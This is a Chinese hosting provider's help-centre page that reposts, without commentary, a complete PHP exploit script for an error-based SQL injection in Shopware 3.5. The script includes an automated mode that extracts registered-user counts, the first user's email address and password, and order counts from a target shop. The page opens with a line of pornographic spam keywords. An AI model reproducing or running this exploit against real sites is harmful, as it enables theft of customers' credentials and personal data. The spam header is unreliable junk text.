无码视频在线观看,99人妻,国产午夜视频,久久久久国产一级毛片高清版新婚

  • 始創(chuàng)于2000年 股票代碼:831685
    咨詢熱線:0371-60135900 注冊(cè)有禮 登錄
    • 掛牌上市企業(yè)
    • 60秒人工響應(yīng)
    • 99.99%連通率
    • 7*24h人工
    • 故障100倍補(bǔ)償
    全部產(chǎn)品
    您的位置: 網(wǎng)站首頁(yè) > 幫助中心>文章內(nèi)容

    Shopware 3.5 – SQL注入漏洞
    發(fā)布時(shí)間:  2012/7/28 18:44:29

     Shopware 3.5 – SQL注入漏洞

    直接貼出代碼
     
     
    function http_req($host, $q)
    {
    if(!$fs = fsockopen($host, 80))
    exit(“Could not open HTTP- Connection to “.$host.”\r\n\r\n”);
    $head = “GET /recommendation/bought/Article/”.urlencode(“0 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (“.$q.”) FROM `information_schema`.`tables` LIMIT 0,1), FLOOR(RAND(0)*2)) x FROM `information_schema`.`tables` GROUP BY x) z)”).” HTTP/1.1\r\n”;
    $head .= “Host: “.$host.”\r\n”;
    $head .= “Connection: Close\r\n\r\n”;
    fwrite($fs, $head);
    $ret = ”;
    while(!feof($fs))
    $ret .= fgets($fs, 4096);
    fclose($fs);
    return $ret;
    }
    function mask($cont)
    {
    if(preg_match(‘/Duplicate entry \’(.*)1\’ for/’, $cont, $m))
    return $m[1];
    else
    return false;
    }
    function space($x)
    {
    $r = ”;
    for($i = 0; $i < $x; $i++)
    $r .= ‘ ‘;
    return $r;
    }
    echo “\r\nExploit Title: Shopware 3.5 – SQL Injection\r\n”;
    echo “Date: 13.07.2012\r\n”;
    echo “Exploit Author: Kataklysmos\r\n”;
    echo “Software Link: http://www.shopware.de/\r\n”;
    echo “Version: 3.5\r\n\r\n”;
    if(!isset($argv[2]))
    {
    echo ” Usage: \r\n”;
    echo ” “.$argv[0].” HOST –auto\r\n”;
    echo ” “.$argv[0].” www.shopwaredemo.de –auto\r\n\r\n”;
    echo ” “.$argv[0].” HOST QUERY\r\n”;
    echo ” “.$argv[0].” www.shopwaredemo.de \”SELECT COUNT(`id`) FROM `s_user`\”\r\n”;
    echo ” “.$argv[0].” www.shopwaredemo.de \”SELECT `email` FROM `s_user` LIMIT 0,1\”\r\n\r\n”;
    exit(1);
    }
    if($argv[2] != ‘–auto’)
    {
    $x = http_req($argv[1], $argv[2]);
    if(!$x = mask($x))
    exit(“Your query failed!\r\n\r\n”);
    echo “Query:\r\n “.$argv[2].”\r\nReturn:\r\n “.$x.”\r\n\r\n”;
    }
    else
    {
    $task = array(array(‘Amount of registered users’, ‘SELECT COUNT(`id`) FROM `s_user`’, null),
    array(‘E- Mail from first user’, ‘SELECT `email` FROM `s_user` ORDER BY `id` LIMIT 0,1′, null),
    array(‘Password from first user’, ‘SELECT `password` FROM `s_user` LIMIT 0,1′, null),
    array(‘Amount of orders’, ‘SELECT COUNT(`id`) FROM `s_order`’, null)
    );
    for($i = 0; $i < count($task); $i++)
    {
    echo “[ .. ] Task: \”".$task[$i][0].”\”";
    $x = http_req($argv[1], $task[$i][1]);
    if(!$x = mask($x))
    echo “\r[fail] Task: \”".$task[$i][0].”\”\r\n”;
    else
    {
    echo “\r[ ok ] Task: \”".$task[$i][0].”\”\r\n”;
    $task[$i][2] = $x;
    }
    }
    echo “\r\n”;
    for($i = 0; $i < count($task); $i++)
    echo $task[$i][0].space(26-strlen($task[$i][0])).’ : ‘.$task[$i][2].”\r\n”;
    echo “\r\n”;
    }
    ?>
     
    億恩科技地址(ADD):鄭州市黃河路129號(hào)天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
       聯(lián)系:億恩小凡
       QQ:89317007
       電話:0371-63322206

    本文出自:億恩科技【mszdt.com】

    本文出自:億恩科技【www.enidc.com】
    -->

    服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)!虛擬主機(jī)域名注冊(cè)頂級(jí)提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM]
  • 您可能在找
  • 億恩北京公司:
  • 經(jīng)營(yíng)性ICP/ISP證:京B2-20150015
    •
  • 億恩鄭州公司:
  • 經(jīng)營(yíng)性ICP/ISP/IDC證:豫B1.B2-20060070
    •
  • 億恩南昌公司:
  • 經(jīng)營(yíng)性ICP/ISP證:贛B2-20080012
    •
  • 服務(wù)器/云主機(jī) 24小時(shí)售后服務(wù)電話:0371-60135900
  • 虛擬主機(jī)/智能建站 24小時(shí)售后服務(wù)電話:0371-60135900
    •
    專注服務(wù)器托管17年
    掃掃關(guān)注-微信公眾號(hào)
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權(quán)所有  地址:鄭州市高新區(qū)翠竹街1號(hào)總部企業(yè)基地億恩大廈  法律顧問(wèn):河南亞太人律師事務(wù)所郝建鋒、杜慧月律師   京公網(wǎng)安備41019702002023號(hào)
      1
     
     
     
     

    0371-60135900
    7*24小時(shí)客服服務(wù)熱線